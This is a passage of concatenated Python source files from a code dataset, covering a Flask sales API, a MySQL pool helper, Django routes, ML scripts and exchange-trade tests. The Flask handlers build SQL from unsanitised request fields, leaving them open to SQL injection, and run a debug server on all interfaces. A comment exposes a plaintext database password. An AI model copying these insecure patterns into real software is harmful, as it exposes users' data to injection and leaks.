ms_prefix.prefix = '\"+prefix+\"';\")\n print (q)\n curr.execute(q)\n rs = curr.fetchall()\n rs_data = {}\n if len(rs) > 0 :\n rs_data[\"response\"] = \"OK\"\n rs_data[\"nama_operator\"] = rs[0][0]\n denom_arr =[]\n for denom in rs:\n denom_arr.append(denom[1])\n rs_data[\"denom_arr\"] = denom_arr\n else :\n rs_data[\"response\"] = 'NOK'\n return json.dumps(rs_data)\n\n@app.route('/input_penjualan_pulsa', methods=[\"POST\",\"GET\"])\ndef input_penjualan_pulsa():\n try:\n res_data = {}\n if request.method == 'GET':\n return api_version\n else:\n if not request.json:\n abort(400)\n data = request.json\n tanggal_registrasi = data['tanggal_registrasi']\n id_transaksi = data['id_transaksi']\n operator = data['operator']\n no_hp = data['no_hp']\n denom = data['denom']\n catatan = data['catatan']\n tipe_transaksi = 'pembelian_pulsa'\n\n app.logger.info(\"input :\" + str(data))\n db = connection.get_db()\n curr = db.cursor()\n q = (\"SELECT id_produk, harga_beli, harga_jual, keuntungan FROM ms_produk WHERE nama_produk = '\"+denom+\"';\")\n print(q)\n curr.execute(q)\n rs = curr.fetchall()\n rs_data = {}\n id_product = harga_beli = 
harga_jual = keuntungan = ''\n if len(rs) > 0:\n id_product = str(rs[0][0])\n harga_beli = str(rs[0][1])\n if harga_beli == None or harga_beli == 'None':\n harga_beli = '0'\n harga_jual = str(rs[0][2])\n if harga_jual == None or harga_jual == 'None':\n harga_jual = '0'\n keuntungan = str(rs[0][3])\n if keuntungan == None or keuntungan == 'None':\n keuntungan = '0'\n q_insert = (\"insert into tr_transaksi (id_transaksi, tipe_transaksi, id_product, no_hp, harga_beli, harga_jual, keuntungan, timestamp) values ('\"+id_transaksi+\"', '\"+tipe_transaksi+\"',\"+id_product+\" ,'\"+no_hp+\"', '\"+harga_beli+\"', '\"+harga_jual+\"', '\"+keuntungan+\"', '\"+tanggal_registrasi+\"');\")\n print(q_insert)\n curr.execute(q_insert)\n db.commit()\n res_data['response'] = 'OK'\n res_data['msg'] = 'Transaksi Sukses'\n return json.dumps(res_data)\n\n except Exception as e:\n res_data = {}\n app.logger.error('An error occured.')\n app.logger.error(e)\n res_data['ACK'] = 'NOK'\n res_data['msg'] = str(e)\n return json.dumps(res_data)\n\nif __name__ == '__main__':\n handler = RotatingFileHandler('/var/log/api-koperasi/API_KOPERASI.log', maxBytes=10000, backupCount=1)\n handler.setLevel(logging.INFO)\n app.logger.addHandler(handler)\n app.run(host='0.0.0.0', port=5000, threaded=True, debug=True)\n # app.run(host='127.0.0.1', port=5000, threaded=True, debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":36351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"368093305","text":"import functools\nimport time\n\n\ndef timeit(func):\n @functools.wraps(func)\n def inner(*args, **kwargs):\n time_before = time.time()\n return_value = func(*args, **kwargs)\n print(f'Execution time for {func.__name__} with args={args} and kwargs={kwargs}:',\n time.time() - time_before)\n return return_value\n return inner\n\n\n@timeit\ndef long_exec_time(lim1, lim2):\n s = 0\n for i in range(lim1):\n for j in range(lim2):\n s += i * j\n return s\n\n\nif __name__ == '__main__':\n s1 = long_exec_time(2000, 2000)\n s2 = long_exec_time(5000, 5000)\n print(s1, s2)\n","sub_path":"solutions/day4_decorators.py","file_name":"day4_decorators.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"644681627","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains \n\ndriver = webdriver.Chrome('c:\\\\pf\\\\bin\\\\chromedriver.exe') \n# Optional argument, if not specified will search path.\n#driver = webdriver.Chrome()\ndriver.get('file://C:/work/git/nodejs-sky/selenium-basics/practice_page.html')\n# create action chain object \naction = ActionChains(driver) \n\nfirst_name = driver.find_element_by_id(\"firstname\")\nfirst_name.send_keys(\"samuel elijah\")\nlast_name = driver.find_element_by_id(\"lastname\")\n\n# click the item \naction.click(on_element = last_name) \n\nlast_name.send_keys(\"wright\")\naction.click(on_element = first_name) \n \n# perform the operation \naction.perform() \n\nexpected_result = \"Samuel Elijah\"\nresult = first_name.get_attribute(\"value\")\n\ndriver.close()\n\nassert expected_result == result\n","sub_path":"manipulate_personal_details.py","file_name":"manipulate_personal_details.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"27093124","text":"import pymysql\nfrom DBUtils.PooledDB 
import PooledDB\n\n\n\nclass MysqlPool:\n\n def __init__(self, host, port,user, password, db):\n self.host = host\n self.port = port # 端口号\n self.user = user # 用户名\n self.password = password # 密码\n self.db = db # 库\n\n def connect(self):\n try:\n self.pool = PooledDB(\n creator=pymysql, # 使用链接数据库的模块\n maxconnections=64, # 连接池允许的最大连接数,0和None表示不限制连接数\n mincached=2, # 初始化时,链接池中至少创建的空闲的链接,0表示不创建\n maxcached=5, # 链接池中最多闲置的链接,0和None不限制\n maxshared=1,\n # 链接池中最多共享的链接数量,0和None表示全部共享。PS: 无用,因为pymysql和MySQLdb等模块的 threadsafety都为1,所有值无论设置为多少,_maxcached永远为0,所以永远是所有链接都共享。\n blocking=True, # 连接池中如果没有可用连接后,是否阻塞等待。True,等待;False,不等待然后报错\n maxusage=None, # 一个链接最多被重复使用的次数,None表示无限制\n setsession=[], # 开始会话前执行的命令列表。如:[\"set datestyle to ...\", \"set time zone ...\"]\n ping=0,\n # ping MySQL服务端,检查是否服务可用。\n # 如:0 = None = never,\n # 1 = default = whenever it is requested,\n # 2 = when a cursor is created,\n # 4 = when a query is executed,\n # 7 = always\n host=self.host,\n port=self.port,\n user=self.user,\n password=self.password,\n database=self.db,\n charset='utf8'\n )\n except Exception as e:\n msg = 'mysql连接失败:{}'.format(e)\n print(msg)\n return msg\n\n def execute_select_need_fetch(self, sql, fetch_type=2, many=10):\n return self.execute(sql, fetch_type=fetch_type, many=many, commmit=False)\n\n def execute_commit_not_fetch(self, sql):\n return self.execute(sql, fetch_type=0)\n\n def execute(self, sql, fetch_type=2, many=10, commmit=True):\n \"\"\"\n :param sql:\n :param commmit: insert,update,delete 等类型需要提交commit操作\n :param fetch_type: fetchone, fetchall, fetchmany\n :param many: fetchmany需要指定数量\n :return:\n \"\"\"\n\n conn = self.pool.connection() # 从连接池创建连接\n cur = conn.cursor(pymysql.cursors.DictCursor)\n # cur = conn.cursor()\n\n row = None\n err_msg = None\n datas = None\n\n try:\n row = cur.execute(sql) # ret是执行受影响的行的数量\n if commmit:\n conn.commit()\n if fetch_type == 0: # 不需要取数据\n pass\n elif fetch_type == 1:\n datas = cur.fetchone() # 获取查询到的所有数据\n elif fetch_type == 2:\n datas = cur.fetchall() # 获取查询到的所有数据\n elif fetch_type == 3:\n datas = cur.fetchmany(many) # 获取查询到的10条数据\n # conn.insert_id() # 插入成功后返回的id\n\n except pymysql.Error as e:\n conn.rollback()\n err_msg = \"发生错误:{};sql:{}\".format(e, sql)\n\n finally:\n cur.close()\n conn.close()\n\n return row, err_msg, datas\n\n def close(self):\n self.pool.close()\n\nif __name__ == '__main__':\n\n \"\"\"\n CREATE TABLE IF NOT EXISTS `hotelgg_tel`(\n `id` INT UNSIGNED AUTO_INCREMENT,\n `hotel_id` INT(15) UNSIGNED NOT NULL,\n `decode` VARCHAR(100) NOT NULL,\n `tel` VARCHAR(20) default '0',\n PRIMARY KEY ( `id` )\n )ENGINE=InnoDB DEFAULT CHARSET=utf8;\n \"\"\"\n\n \"alter table hotelgg_tel change hotelid hotel_id VARCHAR DEFAULT 0\"\n \"alter table hotelgg_tel add tel int(15) default '0';\"\n \"DELETE FROM hotelgg_tel WHERE tel =0;\"\n \"UPDATE hotelgg_tel SET tel={} WHERE hotel_id={};\"\n \"INSERT INTO {} (hotel_id,decode) VALUES ({},'{}')\"\n \"SELECT max(id) FROM table\" # 查询最后一条数据的id值\n \"truncate label_history_6v8_2;\" # 清空表\n\n # host='127.0.0.1'\n # port=3306\n # user='root'\n # password=\"mysql\"\n # db=\"hotel\"\n\n # host = '192.168.100.22'\n # port = 3306\n # user = 'root'\n # password = \"ChinaDASS@2020\"\n # db = \"chinadaas\"\n\n # msyql = MysqlPool(host='127.0.0.1', port=3306, user='root', password=\"mysql\", db=\"hotel\")\n mysql = MysqlPool()\n flag = mysql.connect()\n if flag:\n print(flag)\n row, err_msg, datas = mysql.execute_select_need_fetch(\"select * from jsyh_label where id=3\", fetch_type=1)\n print(row)\n print(err_msg)\n 
print(datas)\n mysql.close()\n\n\n","sub_path":"api/extensions/mysql_tools.py","file_name":"mysql_tools.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"217733578","text":"import json\nimport requests\nfrom urllib.parse import quote\n\n__DEPSDEVAPIURL = \"https://deps.dev/_/s/{ecosystem}/p/{package}/v/{version}\"\n__DEPSDEVADVISORYURL = \"https://deps.dev/_/advisory/{source}/{source_id}\"\n__SEVERITY_DICT = {\n \"UNKNOWN\": 1,\n \"NONE\": 1,\n \"LOW\": 3,\n \"MEDIUM\": 5,\n \"HIGH\": 7,\n \"CRITICAL\": 10,\n}\n\n\ndef get_vulns_from_depsdev(ecosystem, package_name, version):\n result = []\n\n package_name = quote(package_name, safe='')\n url = __DEPSDEVAPIURL.format(ecosystem=ecosystem, package=package_name, version=version)\n\n resp = requests.get(url)\n if resp.status_code == 200:\n data = json.loads(resp.content)\n\n # 获取组件自身漏洞\n if \"version\" in data.keys(): # deps.dev版本展示有错误,有一些组件展示的与go.mod中不一致\n if len(data[\"version\"][\"advisories\"]) > 0:\n for advisorie in data[\"version\"][\"advisories\"]:\n vuln = {}\n vuln[\"vuln_id\"] = advisorie[\"sourceID\"]\n vuln[\"title\"] = advisorie[\"title\"]\n vuln[\"severity\"] = __SEVERITY_DICT[advisorie[\"severity\"]]\n vuln[\"description\"] = advisorie[\"description\"]\n\n cves = []\n for cve in advisorie[\"CVEs\"]:\n cves.append(cve)\n\n vuln[\"cves\"] = json.dumps(cves)\n vuln[\"reference\"] = advisorie[\"sourceURL\"]\n\n # 获取全部影响版本\n source = advisorie[\"source\"]\n affected_versions = __get_affected_versions(package_name, source, vuln[\"vuln_id\"])\n vuln[\"affected_versions\"] = affected_versions\n\n result.append(vuln)\n\n return result\n\ndef __get_affected_versions(package_name, source, source_id):\n result = []\n\n url = __DEPSDEVADVISORYURL.format(source=source, source_id=source_id)\n resp = requests.get(url)\n if resp.status_code == 200:\n data = json.loads(resp.content)\n\n for pkg in data[\"packages\"]:\n if pkg[\"package\"][\"name\"] != package_name:\n continue\n\n if len(pkg[\"versionsAffected\"]) > 0:\n for version in pkg[\"versionsAffected\"]:\n result.append(version[\"version\"])\n return result","sub_path":"core/vuln_apis/depsdev.py","file_name":"depsdev.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"533137107","text":"from django.conf.urls import url\r\n\r\nfrom . 
import views\r\n\r\napp_name = 'multivers'\r\n\r\nurlpatterns = [\r\n url(r'^$', view=views.Index.as_view(), name='index'),\r\n url(r'^code(/(?P[0-9]+))?$', view=views.SaveCode.as_view(), name='code'),\r\n\r\n url(r'^customer/(?P[0-9]+)/edit$', view=views.CustomerUpdate.as_view(), name='customer_update'),\r\n url(r'^location/(?P[0-9]+)/edit$', view=views.LocationUpdate.as_view(), name='location_update'),\r\n url(r'^settings/(?P[0-9]+)/edit$', view=views.SettingsUpdate.as_view(), name='settings_update'),\r\n\r\n url(r'^products$', view=views.Products.as_view(), name='products'),\r\n url(r'^product/add$', view=views.ProductCreate.as_view(), name='product_add'),\r\n url(r'^product/(?P[0-9]+)/edit$', view=views.ProductUpdate.as_view(), name='product_edit'),\r\n url(r'^product/(?P[0-9]+)/delete$', view=views.ProductDelete.as_view(), name='product_delete'),\r\n\r\n url(r'^order/(?P[0-9]+)$', view=views.ConceptOrderView.as_view(), name='order_view'),\r\n url(r'^order/(?P[0-9]+)/delete$', view=views.ConceptOrderDelete.as_view(), name='order_delete'),\r\n url(r'^order/createFromFile$', view=views.OrdersCreateFromFile.as_view(), name='orders_create_from_file'),\r\n url(r'^order/sendAll$', view=views.OrdersSendAllView.as_view(), name='orders_send_all'),\r\n\r\n url(r'^order/(?P[0-9]+)/drink/create$', view=views.ConceptOrderDrinkCreateView.as_view(), name='order_drink_create'),\r\n url(r'^order/drink/(?P[0-9]+)/edit$', view=views.ConceptOrderDrinkEditView.as_view(), name='order_drink_edit'),\r\n url(r'^order/drink/(?P[0-9]+)/delete$', view=views.ConceptOrderDrinkDeleteView.as_view(), name='order_drink_delete'),\r\n\r\n url(r'^order/drink/(?P[0-9]+)/line/create', view=views.ConceptOrderDrinkLineCreateView.as_view(), name='order_drink_line_create'),\r\n url(r'^order/drink/line/(?P[0-9]+)/edit', view=views.ConceptOrderDrinkLineEditView.as_view(), name='order_drink_line_edit'),\r\n url(r'^order/drink/line/(?P[0-9]+)/delete', view=views.ConceptOrderDrinkLineDeleteView.as_view(), name='order_drink_line_delete'),\r\n\r\n url(r'^test$', view=views.test, name='test'),\r\n]\r\n","sub_path":"apps/multivers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"476135255","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'news'\n\nurlpatterns = [\n path('', views.index, name='index'),\n\n path('index2/', views.index2, name='index2'),\n path('/', views.detail, name='detail'),\n path('/results/', views.results, name='results'),\n path('/vote/', views.vote, name='vote'),\n\n # path('index2/', views.IndexView.as_view(), name='index'),\n # path('/', views.DetailView.as_view(), name='detail'),\n # path('/results/', views.ResultsView.as_view(), name='results'),\n # path('/vote/', views.vote, name='vote'),\n\n path(route='art/', view=views.page, name='art'),\n path('edit/', views.edit, name='edit'),\n path('save', views.save, name='save'),\n path('delete/', views.delete, name='delete'),\n]\n","sub_path":"API/PYTHON/django/blogTest/news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"20272179","text":"import pandas as pd\r\nimport os\r\nfrom createxlsx import *\r\nimport json\r\nimport datetime\r\n\r\n#file containing data for after login is sucessful\r\nFILE_NAME = \"final.xlsx\"\r\ndatabase_template = pd.DataFrame([],[],[\"UID\",\"data\"]).set_index([\"UID\"])\r\ndatabase_template.loc[\"admin\"] = {\"admin\":{\"data\":\"admin\",\"status\":\"pending\"}}\r\n\r\n#function for new inputs\r\n#no returns its always sucessful\r\ndef new_entry(uid,inp):\r\n new_excel(database_template,FILE_NAME)\r\n handle = pd.read_excel(FILE_NAME,index_col=\"UID\")\r\n users = handle.index\r\n if(uid in users):\r\n old_data = handle.loc[uid][\"data\"] #reads old data\r\n old_data = old_data.replace(\"\\'\",\"\\\"\") #replaces ' with \"\r\n old_data = json.loads(old_data) #reads string converts to dict\r\n #stamp = date+time unique id\r\n hash = str(datetime.datetime.now().date()) + \"+\" + str(str(datetime.datetime.now().time()))\r\n #data is stored in the form-\r\n #excel file -> uid -> data column -> dict(explained below)\r\n #{datetime stamp : {data:\" \",status:\" \"} , {}}\r\n old_data[hash] = {\"data\":inp,\"status\":\"pending\"}\r\n handle.loc[uid][\"data\"] = old_data\r\n else:\r\n hash = str(datetime.datetime.now().date()) + \"+\" + str(str(datetime.datetime.now().time()))\r\n temp = dict()\r\n temp[hash] = {\"data\":inp,\"status\":\"pending\"}\r\n handle.loc[uid] = [temp]\r\n create_excel(handle,FILE_NAME)\r\n\r\n#new_entry(\"dkw\",\"34sercdf b65 rfghb tyughbjn\")\r\n\r\n#function to check previous entries\r\n#sucessful = (1,data in dictionary form as it was stored, see above)\r\n#fail = (0,\"No record found\")\r\ndef old_entry(uid):\r\n new_excel(database_template,FILE_NAME)\r\n handle = pd.read_excel(FILE_NAME,index_col=\"UID\")\r\n users = handle.index\r\n if(uid in users):\r\n temp = (handle.loc[uid][\"data\"])\r\n temp = str(temp)\r\n temp = temp.replace(\"\\'\",\"\\\"\")\r\n temp = json.loads(temp)\r\n return (1,temp)\r\n else:\r\n return (0,\"No record found\")\r\n#print((old_entry(\"dk\")))\r\n","sub_path":"Smart_Help/userlevel.py","file_name":"userlevel.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"388733023","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport numpy as np\nfrom PIL import Image\nimport fnmatch\nfrom pathlib import Path\nfrom .cocoobjects import COCOimage, COCOann\n\nconvert = lambda text: int(text) if text.isdigit() else text.lower()\nnatrual_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n\n\n# filter images 
methods\n\ndef filter_for_img(root, files, file_types=None):\n if file_types is None:\n file_types = ['*.jpeg', '*.jpg']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n return files\n\n\ndef filter_for_annotations(root, files, image_filename, file_types=None):\n if file_types is None:\n file_types = ['*.png']\n file_types = r'|'.join([fnmatch.translate(x) for x in file_types])\n basename_no_extension = os.path.splitext(os.path.basename(image_filename))[0]\n file_name_prefix = basename_no_extension + '.*'\n files = [os.path.join(root, f) for f in files]\n files = [f for f in files if re.match(file_types, f)]\n files = [f for f in files if re.match(file_name_prefix, os.path.splitext(os.path.basename(f))[0])]\n return files\n\ndef convert2coco(coco_header, IMAGE_DIR, ANNOTATION_DIR, img_file_types=None, ann_file_types=None ):\n coco_output = coco_header.copy()\n CATEGORIES = coco_header[\"categories\"]\n segmentation_id = 1\n\n # filter for jpeg images\n for root, _, files in os.walk(IMAGE_DIR):\n image_files = filter_for_img(root, files, file_types=img_file_types)\n\n # go through each image\n for image_filename in image_files:\n image_id = int(Path(image_filename).stem)\n image_info = COCOimage(image_id, image_filename).todict()\n coco_output[\"images\"].append(image_info)\n\n # filter for associated png annotations\n for root, _, files in os.walk(ANNOTATION_DIR):\n annotation_files = filter_for_annotations(root, files, image_filename, file_types=ann_file_types)\n\n # go through each associated annotation\n for annotation_filename in annotation_files:\n\n print(annotation_filename)\n class_id = [x['id'] for x in CATEGORIES if x['name'] in annotation_filename][0]\n\n category_info = {'id': class_id, 'is_crowd': 'crowd' in image_filename}\n\n annotation_info = COCOann(segmentation_id, image_id, category_info, annotation_filename,\n image_size=[image_info['width'], image_info['height']]).todict()\n\n if annotation_info is not None:\n coco_output[\"annotations\"].append(annotation_info)\n\n segmentation_id = segmentation_id + 1\n return coco_output","sub_path":"medicalpycoco/medicalpycocotools.py","file_name":"medicalpycocotools.py","file_ext":"py","file_size_in_byte":2851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"622864019","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom typing import Tuple\n\nfrom slowmo.Task import Task\n\n\n@dataclass(frozen=True)\nclass TaskTree:\n task: Task\n subtrees: Tuple[TaskTree, ...] 
= tuple()\n\n @staticmethod\n def get_at(tt: TaskTree, path: Tuple[int, ...]) -> TaskTree:\n if len(path) == 0:\n return tt\n\n ix = path[0]\n st = tt.subtrees[ix]\n return TaskTree.get_at(st, path[1:])\n\n @staticmethod\n def replace_at(\n tt: TaskTree, path: Tuple[int, ...], replace: Callable[[TaskTree], TaskTree]\n ) -> TaskTree:\n if len(path) == 0:\n return replace(tt)\n ix = path[0]\n sts = tt.subtrees\n subtrees = (\n *sts[:ix],\n TaskTree.replace_at(sts[ix], path[1:], replace),\n *sts[ix + 1 :],\n )\n return TaskTree(tt.task, subtrees)\n\n @staticmethod\n def add_subtree(tt: TaskTree, st: TaskTree) -> TaskTree:\n return TaskTree(tt.task, tt.subtrees + (st,))\n\n @staticmethod\n def display(tt: TaskTree, path=tuple(), spinner=\"X\") -> str:\n d = [\"\\t\" * len(path) + Task.display(tt.task, spinner)]\n for i, st in enumerate(tt.subtrees):\n d += [TaskTree.display(st, path + (i,), spinner)]\n return \"\\n\".join(d)\n\n @staticmethod\n def size(root: TaskTree) -> int:\n if len(root.subtrees) == 0:\n return 1\n return 1 + sum(TaskTree.size(st) for st in root.subtrees)\n","sub_path":"WebCrawler/venv/lib/python3.7/site-packages/slowmo/TaskTree.py","file_name":"TaskTree.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"146329241","text":"#number guessing\nimport random\n\nnum = random.randint(1,100)\nprint(\"Hi,welcome to the Mathlogic.Have fun by playing this game.For help,I will provide you the clues.\\nMaximun attempts : 5 \")\nrecord = int(input(\"Enter any number between 1 and 100: \")) \nattempts = 1\nscore = 10\nmax_attempts = 5\nwhile True:\n def even_or_odd():\n if num%2 == 0:\n print(\"Clue 1: Computer guessed an even number.\")\n else:\n print(\"Clue 1: Computer guessed an odd number.\")\n def div_5():\n clue2 = num % 5\n print(f\"Clue 2: If the number is divided by 5,then it leaves a remainder: {clue2}\")\n def final_clue():\n num_str = str(num)\n print(\"Final clue: Number ends with : \",num_str[-1])\n\n if max_attempts <= 5 and max_attempts > 1:\n if num == record:\n print(f\"Your guess matches with the computer in {attempts} attempts with score: {score}pts.\")\n attempts = 1\n score = 10\n break\n \n elif num > record:\n max_attempts = max_attempts -1\n print(f\"\\nChoose a number which is greater than the previous number.\\nRemaining attempts left:{max_attempts}\")\n attempts = attempts + 1\n score = score - 1\n if attempts == 2:\n even_or_odd()\n elif attempts == 4:\n div_5() \n elif attempts == 5:\n final_clue() \n record = int(input(\"Enter any number between 1 and 100: \"))\n \n elif num < record:\n max_attempts = max_attempts -1\n print(f\"\\nChoose a number which is lower than the previous number.\\nRemaining attempts left:{max_attempts}\")\n attempts = attempts + 1\n score = score - 1\n if attempts == 2:\n even_or_odd()\n elif attempts == 4:\n div_5() \n elif attempts == 5:\n final_clue() \n record = int(input(\"Enter any number between 1 and 100: \"))\n \n else:\n print(\"\\nMaximum attempts are reached. 
You lost the game.\\nThe number which you missed:\",num)\n break","sub_path":"beg/umber_guessing.py","file_name":"umber_guessing.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"529645882","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport os\nimport sys\nimport logging\nimport pickle\nimport numpy as np\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Embedding, Bidirectional, LSTM\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras_contrib.layers import CRF\n\nEPOCHS = 10\nEMBEDDING_DIM = 200\nBiLSTM_HIDDEN_DIM = 200\n\nerror_dict = {\n 'R': 1,\n 'M': 2,\n 'S': 3,\n 'W': 4\n}\n\ndef get_idx_from_sent(sent, word_idx_map):\n x = []\n\n for word in sent:\n if word in word_idx_map:\n x.append(word_idx_map[word])\n else:\n x.append(1)\n return x\n\ndef make_idx_data(revs, word_idx_map, maxlen=60):\n X_train, X_test, y_train = [], [], []\n for rev in revs:\n sent = get_idx_from_sent(rev['text'], word_idx_map)\n\n if rev['option'] == 'train':\n y = rev['label']\n\n X_train.append(sent)\n y_train.append(y)\n\n elif rev['option'] == 'test':\n X_test.append(sent)\n\n X_train = sequence.pad_sequences(np.array(X_train), maxlen=maxlen)\n X_test = sequence.pad_sequences(np.array(X_test), maxlen=maxlen)\n # X_valid = sequence.pad_sequences(np.array(X_valid), maxlen=maxlen)\n y_train = sequence.pad_sequences(np.array(y_train), maxlen=maxlen)\n y_train = np.reshape(y_train, (y_train.shape[0], y_train.shape[1], 1))\n\n print(X_train.shape)\n print(y_train.shape)\n print(X_test.shape)\n return X_train, y_train, X_test\n\nif __name__ == '__main__':\n program = os.path.basename(sys.argv[0])\n logger = logging.getLogger(program)\n \n logging.basicConfig(format='%(asctime)s: %(levelname)s: %(message)s')\n logging.root.setLevel(level=logging.INFO)\n logger.info(r\"running %s\" % ''.join(sys.argv))\n\n logging.info('loading data...')\n pickle_file = os.path.join('pickle', 'cged_hsk_cwe.pickle3')\n revs, W, word_idx_map, vocab, maxlen = pickle.load(open(pickle_file, 'rb'))\n logging.info('data loaded!')\n\n X_train, y_train, X_test = make_idx_data(revs, word_idx_map, maxlen=maxlen)\n\n\n num_words = W.shape[0]\n logging.info(\"number of word vector [num_words]: %d\" % num_words)\n\n embdding_dim = W.shape[1] # 400\n logging.info(\"dimension num of word vector [embdding_dim]: %d\" % embdding_dim)\n\n # --------------\n # 1. 
Regular CRF\n # --------------\n\n print('==== training CRF ====')\n\n model = Sequential()\n model.add(Embedding(num_words, embdding_dim, mask_zero=True, weights=[W], trainable=False)) # pre-trained embedding\n crf = CRF(len(error_dict), sparse_target=True)\n model.add(crf)\n\n model.compile('adam', loss=crf.loss_function, metrics=[crf.accuracy])\n model.fit(X_train, y_train, epochs=EPOCHS, validation_data=[X_train, y_train])\n\n y_test_pred = model.predict(X_test).argmax(-1)\n print(y_test_pred)\n\n y_pred = []\n for i in range(len(y_test_pred)):\n line_data = y_test_pred[i]\n for j in range(len(line_data)):\n y_pred.append(line_data[j])\n\n print(y_pred.count(0))\n print(y_pred.count(1))\n print(y_pred.count(2))\n print(y_pred.count(3))\n print(y_pred.count(4))","sub_path":"cged16_hsk_vector_crf.py","file_name":"cged16_hsk_vector_crf.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"215681826","text":"import os\nfrom unittest.mock import patch\n\nfrom rotkehlchen.fval import FVal\nfrom rotkehlchen.order_formatting import Trade, TradeType\nfrom rotkehlchen.poloniex import Poloniex, trade_from_poloniex\n\n\ndef test_trade_from_poloniex():\n amount = FVal(613.79427133)\n rate = FVal(0.00022999)\n perc_fee = FVal(0.0015)\n cost = amount * rate\n poloniex_trade = {\n 'globalTradeID': 192167,\n 'tradeID': FVal(3727.0),\n 'date': '2017-07-22 21:18:37',\n 'rate': rate,\n 'amount': amount,\n 'total': FVal(0.14116654),\n 'fee': perc_fee,\n 'orderNumber': FVal(2315432.0),\n 'type': 'sell',\n 'category': 'exchange',\n }\n\n trade = trade_from_poloniex(poloniex_trade, 'BTC_ETH')\n\n assert isinstance(trade, Trade)\n assert isinstance(trade.timestamp, int)\n assert trade.timestamp == 1500758317\n assert trade.trade_type == TradeType.SELL\n assert trade.rate == rate\n assert trade.amount == amount\n assert trade.pair == 'ETH_BTC'\n assert trade.fee == cost * perc_fee\n assert trade.fee_currency == 'BTC'\n assert trade.location == 'poloniex'\n\n\ndef test_query_trade_history_not_shared_cache(data_dir):\n \"\"\"Test that having 2 different poloniex instances does not use same cache\n\n Regression test for https://github.com/rotkehlchenio/rotkehlchen/issues/232\n We are using poloniex as an example here. 
Essentially tests all exchange caches.\n \"\"\"\n\n def first_trades(currencyPair, start, end):\n return {'BTC': [{'data': 1}]}\n\n def second_trades(currencyPair, start, end):\n return {'BTC': [{'data': 2}]}\n\n end_ts = 99999999999\n first_user_dir = os.path.join(data_dir, 'first')\n os.mkdir(first_user_dir)\n second_user_dir = os.path.join(data_dir, 'second')\n os.mkdir(second_user_dir)\n a = Poloniex(b'', b'', None, first_user_dir)\n with patch.object(a, 'returnTradeHistory', side_effect=first_trades):\n result1 = a.query_trade_history(0, end_ts, end_ts)\n\n b = Poloniex(b'', b'', None, second_user_dir)\n with patch.object(b, 'returnTradeHistory', side_effect=second_trades):\n result2 = b.query_trade_history(0, end_ts, end_ts)\n\n assert result1['BTC'][0]['data'] == 1\n assert result2['BTC'][0]['data'] == 2\n","sub_path":"rotkehlchen/tests/test_poloniex.py","file_name":"test_poloniex.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"249108137","text":"'''\nCreated on Sep 8, 2019\n\n@author: snake91\n'''\n\nimport pymc3 as pm\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport mle.simulate as sim\n\n\nnp.random.seed(1)\nphi1 = 0.1\n\n\ny = sim.arpGaussian(t = 200, phi = [phi1])\n\n\n\ndef b0_bayesianmodel(y):\n with pm.Model() as model: # model specifications in PyMC3 are wrapped in a with-statement\n # Define priors\n # sigma = HalfCauchy('sigma', beta=10, testval=1.)\n sigma = 1\n intercept = pm.Uniform('phi1', -0.99, 0.99)\n x_coeff = phi1#Normal('x', 0, sd=20)\n \n # Define likelihood\n likelihood = pm.Normal('y', mu= np.hstack([[0], phi1 * y[1:]]), \n sd=sigma, observed=y)\n \n # Inference!\n trace = pm.sample(1000, tune = 500, progressbar=True, chains = 2, cores=4) # draw posterior samples using NUTS sampling\n# print(trace)\n\n pm.traceplot(trace, var_names = ['phi1'])\n plt.tight_layout();\n\n return pm.summary(trace, var_names = ['phi1'])\n\n\n\ndef b0b1_bayesianmodel(x, y):\n with pm.Model() as model: # model specifications in PyMC3 are wrapped in a with-statement\n # Define priors \n # sigma = HalfCauchy('sigma', beta=10, testval=1.)\n sigma = pm.HalfCauchy('sigma', beta = 10)\n intercept = pm.Normal('b0', 10, sd=2)\n x_coeff = pm.Normal('b1', 10, sd=20)\n \n # Define likelihood\n likelihood = pm.Normal('y', mu=intercept + x_coeff * x, \n sd=sigma, observed=y)\n \n # Inference!\n trace = pm.sample(4000, tune = 2000, progressbar=True, chains = 10, 